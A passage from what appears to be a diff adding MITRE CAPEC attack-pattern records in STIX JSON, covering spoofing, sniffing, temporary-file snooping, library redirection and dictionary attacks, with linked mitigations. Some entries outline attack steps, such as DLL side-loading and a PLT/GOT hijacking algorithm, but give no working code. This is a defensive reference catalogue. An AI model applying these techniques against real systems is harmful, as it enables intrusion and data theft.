"attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Identity Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "attack-pattern--cd6af290-f89e-4238-95b3-6f06d05ed814", + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Communications", + "Software", + "Hardware" + ], + "x_capec_extended_description": "\n Alternatively, an adversary may intercept a message from a legitimate sender and attempt to make it look like the message comes from them without changing its content. The latter form of this attack can be used to hijack credentials from legitimate users. Identity Spoofing attacks need not be limited to transmitted messages - any resource that is associated with an identity (for example, a file with a signature) can be the target of an attack where the adversary attempts to change the apparent identity. This attack differs from Content Spoofing attacks where the adversary does not wish to change the apparent identity of the message but instead wishes to change what the message says. In an Identity Spoofing attack, the adversary is attempting to change the identity of the content.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5", + "attack-pattern--8711eca6-b3ad-40b7-b7ac-08be37885119", + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9", + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_prerequisites": [ + "The identity associated with the message or resource must be removable or modifiable in an undetectable way." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ robust authentication processes (e.g., multi-factor authentication).", + "id": "course-of-action--a4ee4981-07bd-4a5d-bc5b-3159e9005c04", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-151-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4e224ed0-2d80-495f-925d-d726a7fe4f81", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4ee4981-07bd-4a5d-bc5b-3159e9005c04", + "target_ref": "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits a weakness in input validation by controlling the format, structure, and composition of data to an input-processing interface. By supplying input of a non-standard or unexpected form an attacker can adversely impact the security of the target.", + "external_references": [ + { + "external_id": "CAPEC-153", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/153.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + } + ], + "id": "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Input Data Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, using a different character encoding might cause dangerous text to be treated as safe text. Alternatively, the attacker may use certain flags, such as file extensions, to make a target application believe that provided data should be handled using a certain interpreter when the data is not actually of the appropriate type. This can lead to bypassing protection mechanisms, forcing the target to use specific components for input processing, or otherwise causing the user's data to be handled differently than might otherwise be expected. This attack differs from Variable Manipulation in that Variable Manipulation attempts to subvert the target's processing through the value of the input while Input Data Manipulation seeks to control how the input is processed.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "attack-pattern--1f3b920a-a706-494c-9486-69531a514912", + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_prerequisites": [ + "The target must accept user data for processing and the manner in which this data is processed must depend on some aspect of the format or flags that the attacker can control." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary deceives an application or user and convinces them to request a resource from an unintended location. By spoofing the location, the adversary can cause an alternate resource to be used, often one that the adversary controls and can be used to help them achieve their malicious goals.", + "external_references": [ + { + "external_id": "CAPEC-154", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/154.html" + }, + { + "external_id": "CWE-451", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/451.html" + } + ], + "id": "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Resource Location Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Communications", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_prerequisites": [ + "None. All applications rely on file paths and therefore, in theory, they or their resources could be affected by this type of attack." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor network activity to detect any anomalous or unauthorized communication exchanges.", + "id": "course-of-action--eeb4d011-944b-4c48-9b7e-9cea2b3c86df", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-154-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef1a3b66-cfc8-4c92-9df9-237b586b11f2", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eeb4d011-944b-4c48-9b7e-9cea2b3c86df", + "target_ref": "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits the temporary, insecure storage of information by monitoring the content of files used to store temp data during an application's routine execution flow. Many applications use temporary files to accelerate processing or to provide records of state across multiple executions of the application. Sometimes, however, these temporary files may end up storing sensitive information. By screening an application's temporary files, an adversary might be able to discover such sensitive information. For example, web browsers often cache content to accelerate subsequent lookups. If the content contains sensitive information then the adversary could recover this from the web cache.", + "external_references": [ + { + "external_id": "CAPEC-155", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/155.html" + }, + { + "external_id": "CWE-377", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/377.html" + } + ], + "id": "attack-pattern--7fea6e82-183a-4811-9b71-1ebe4d6c8b11", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Screen Temporary Files for Sensitive Information", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--bddd2549-167f-4f7b-8d0f-6d1e647b26f6" + ], + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Look for temporary files in target application: An adversary will try to discover temporary files in a target application. Knowledge of where the temporary files are being stored is important information.

Experiment

  1. Attempt to read temporary files: An adversary will attempt to read any temporary files they may have discovered through normal means.

    2. Techniques
    Attempt to get the file by querying the file path to a web server
    Using a remote shell into an application, read temporary files and send out information remotely if necessary
    Recover temporary information from a user's browser cache

Exploit

  1. Use function weaknesses to gain access to temporary files: If normal means to read temporary files did not work, an adversary will attempt to exploit weak temporary file functions to gain access to temporary files.

    2. Techniques
    Some C functions such as tmpnam(), tempnam(), and mktemp() will create a temporary file with a unique name, but do not stop an adversary from creating a file of the same name before it is opened by the application. Because these functions do not create file names that are sufficiently random, an adversary will try to make a file of the same name, causing a collision, and possibly altering file permissions for the temporary file so that it is able to be read.
    Similar to the last technique, an adversary might also create a file name collision using a linked file in a unix system such that the temporary file contents written out by the application write to a file of the adversaries choosing, allowing them to read the file contents.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target application must utilize temporary files and must fail to adequately secure them against other parties reading them." + ], + "x_capec_resources_required": [ + "Because some application may have a large number of temporary files and/or these temporary files may be very large, an adversary may need tools that help them quickly search these files for sensitive information. If the adversary can simply copy the files to another location and if the speed of the search is not important, the adversary can still perform the attack without any special resources." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, the adversary intercepts information transmitted between two third parties. The adversary must be able to observe, read, and/or hear the communication traffic, but not necessarily block the communication or change its content. Any transmission medium can theoretically be sniffed if the adversary can examine the contents between the sender and recipient. Sniffing Attacks are similar to Adversary-In-The-Middle attacks (CAPEC-94), but are entirely passive. AiTM attacks are predominantly active and often alter the content of the communications themselves.", + "external_references": [ + { + "external_id": "CAPEC-157", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/157.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + } + ], + "id": "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Sniffing Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c" + ], + "x_capec_child_of_refs": [ + "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Communication Mechanism: The adversary determines the nature and mechanism of communication between two components, looking for opportunities to exploit.

    2. Techniques
    Look for application documentation that might describe a communication mechanism used by a target.

Experiment

  1. Position In Between Targets: The adversary positions themselves somewhere in the middle of the two components. If the communication is encrypted, the adversary will need to act as a proxy and route traffic between the components, exploiting a flaw in the encryption mechanism. Otherwise, the adversary can just observe the communication at either end.

    2. Techniques
    Use Wireshark or some other packet capturing tool to capture traffic on a network.
    Install spyware on a client that will intercept outgoing packets and route them to their destination as well as route incoming packets back to the client.
    Exploit a weakness in an encrypted communication mechanism to gain access to traffic. Look for outdated mechanisms such as SSL.

Exploit

  1. Listen to Communication: The adversary observes communication, but does not alter or block it. The adversary gains access to sensitive information and can potentially utilize this information in a malicious way.

", + "x_capec_parent_of_refs": [ + "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "attack-pattern--cddb7bce-8d94-4eea-8e73-9f6ef66376c2", + "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "attack-pattern--c7f0c73b-fe94-49c9-89bb-a3ec4441e4ee", + "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4" + ], + "x_capec_prerequisites": [ + "The target data stream must be transmitted on a medium to which the adversary has access." + ], + "x_capec_resources_required": [ + "The adversary must be able to intercept the transmissions containing the data of interest. Depending on the medium of transmission and the path the data takes between the sender and recipient, the adversary may require special equipment and/or require that this equipment be placed in specific locations (e.g., a network sniffing tool)" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt sensitive information when transmitted on insecure mediums to prevent interception.", + "id": "course-of-action--8e8679ec-95e4-4391-abb4-9a40406a3476", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-157-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ec5d6642-3556-4d29-8f30-07ab3be9ab1a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e8679ec-95e4-4391-abb4-9a40406a3476", + "target_ref": "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, the adversary monitors network traffic between nodes of a public or multicast network in an attempt to capture sensitive information at the protocol level. Network sniffing applications can reveal TCP/IP, DNS, Ethernet, and other low-level network communication information. The adversary takes a passive role in this attack pattern and simply observes and analyzes the traffic. The adversary may precipitate or indirectly influence the content of the observed transaction, but is never the intended recipient of the target information.", + "external_references": [ + { + "external_id": "CAPEC-158", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/158.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Network Sniffing", + "external_id": "T1040", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1040" + }, + { + "description": "Multi-Factor Authentication Interception", + "external_id": "T1111", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1111" + } + ], + "id": "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Sniffing Network Traffic", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--67cf8bc2-3d17-4ecf-b52e-febdb7804a37" + ], + "x_capec_child_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "The target must be communicating on a network protocol visible by a network sniffing application.", + "The adversary must obtain a logical position on the network from intercepting target network traffic is possible. Depending on the network topology, traffic sniffing may be simple or challenging. If both the target sender and target recipient are members of a single subnet, the adversary must also be on that subnet in order to see their traffic communication." + ], + "x_capec_resources_required": [ + "A tool with the capability of presenting network communication traffic (e.g., Wireshark, tcpdump, Cain and Abel, etc.)." + ], + "x_capec_skills_required": { + "Low": "Adversaries can obtain and set up open-source network sniffing tools easily." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Obfuscate network traffic through encryption to prevent its readability by network sniffers.", + "id": "course-of-action--26edfe3d-53cd-4d09-abbf-84ee7c48236f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-158-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--28658fd8-29a0-4a6b-b8a9-d7a967352c4e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26edfe3d-53cd-4d09-abbf-84ee7c48236f", + "target_ref": "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ appropriate levels of segmentation to your network in accordance with best practices.", + "id": "course-of-action--3ca8bdc8-6a37-4294-acfe-2e658e9e0fe6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-158-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d1c000a2-67f9-4572-af06-6707542d5784", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3ca8bdc8-6a37-4294-acfe-2e658e9e0fe6", + "target_ref": "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in the way an application searches for external libraries to manipulate the execution flow to point to an adversary supplied library or code base. This pattern of attack allows the adversary to compromise the application or server via the execution of unauthorized code. An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. If an adversary can redirect an application's attempts to access these libraries to other libraries that the adversary supplies, the adversary will be able to force the targeted application to execute arbitrary code. This is especially dangerous if the targeted application has enhanced privileges. Access can be redirected through a number of techniques, including the use of symbolic links, search path modification, and relative path manipulation.", + "external_references": [ + { + "external_id": "CAPEC-159", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/159.html" + }, + { + "external_id": "CWE-706", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/706.html" + }, + { + "description": "Hijack Execution Flow:Path Interception by Search Order Hijacking", + "external_id": "T1574.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/008" + }, + { + "description": "Silvio Cesare, Share Library Call Redirection Via ELF PLT Infection (Issue 56), Phrack Magazine, 2000", + "external_id": "REF-29", + "source_name": "reference_from_CAPEC", + "url": "http://phrack.org/issues/56/7.html" + }, + { + "description": "OWASP Top 10 2007 (2007), The Open Web Application Security Project (OWASP)", + "external_id": "REF-30", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/www-pdf-archive/OWASP_Top_10_2007.pdf" + } + ], + "id": "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Redirect Access to Libraries", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "In this example, the attacker using ELF infection that redirects the Procedure Linkage Table (PLT) of an executable allowing redirection to be resident outside of the infected executable. The algorithm at the entry point code is as follows... • mark the text segment writeable • save the PLT(GOT) entry • replace the PLT(GOT) entry with the address of the new lib call The algorithm in the new library call is as follows... • do the payload of the new lib call • restore the original PLT(GOT) entry • call the lib call • save the PLT(GOT) entry again (if its changed) • replace the PLT(GOT) entry with the address of the new lib call" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify Target: The adversary identifies the target application and determines what libraries are being used.

    2. Techniques
    Find public source code and identify library dependencies.
    Gain access to the system hosting the application and look for libraries in common locations.

Experiment

  1. Deploy Malicious Libraries: The adversary crafts malicious libraries and deploys them on the system where the application is running, or in a remote location that can be loaded by the application.

Exploit

  1. Redirect Library Calls to Malicious Library: Once the malicious library crafted by the adversary is deployed, the adversary will manipulate the flow of the application such that it calls the malicious library. This can be done in a variety of ways based on how the application is loading and calling libraries.

    2. Techniques
    Poison the DNS cache of the system so that it loads a malicious library from a remote location hosted by the adversary instead of the legitimate location
    Create a symlink that tricks the application into thinking that a malicious library is the legitimate library.
    Use DLL side-loading to place a malicious verison of a DLL in the windows directory.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--7cb5458d-b646-4a25-ad0a-4c3fabd70a65", + "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "attack-pattern--abdd46ce-dd2d-4430-8032-aa3ee1d262fd", + "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328" + ], + "x_capec_prerequisites": [ + "The target must utilize external libraries and must fail to verify the integrity of these libraries before using them." + ], + "x_capec_skills_required": { + "High": "To reverse engineering the libraries and inject malicious code into the libraries", + "Low": "To modify the entries in the configuration file pointing to malicious libraries", + "Medium": "To force symlink and timing issues for redirecting access to libraries" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Restrict the permission to modify the entries in the configuration file.", + "id": "course-of-action--f26a4acf-baf0-4bf2-a143-bc1b7c62e85f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-159-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cd6337df-a7bd-4afe-b168-4189a828cafb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f26a4acf-baf0-4bf2-a143-bc1b7c62e85f", + "target_ref": "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Check the integrity of the dynamically linked libraries before use them.", + "id": "course-of-action--3654cbd2-7f0f-4ca2-8104-ac4038549426", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-159-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--34ed3417-5e22-490d-b967-b77e3be13f50", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3654cbd2-7f0f-4ca2-8104-ac4038549426", + "target_ref": "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use obfuscation and other techniques to prevent reverse engineering the libraries.", + "id": "course-of-action--3b7c420e-04b7-4432-90f3-cdcec1a162cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-159-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--915e2bb6-c5cc-4d8c-b3f9-062b7c13ead4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3b7c420e-04b7-4432-90f3-cdcec1a162cb", + "target_ref": "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user's account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.\n Dictionary Attacks differ from similar attacks such as Password Spraying (CAPEC-565) and Credential Stuffing (CAPEC-600), since they leverage unknown username/password combinations and don't care about inducing account lockouts.\n ", + "external_references": [ + { + "external_id": "CAPEC-16", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/16.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + } + ], + "id": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Dictionary-based Password Attack", + "object_marking_refs": [ + 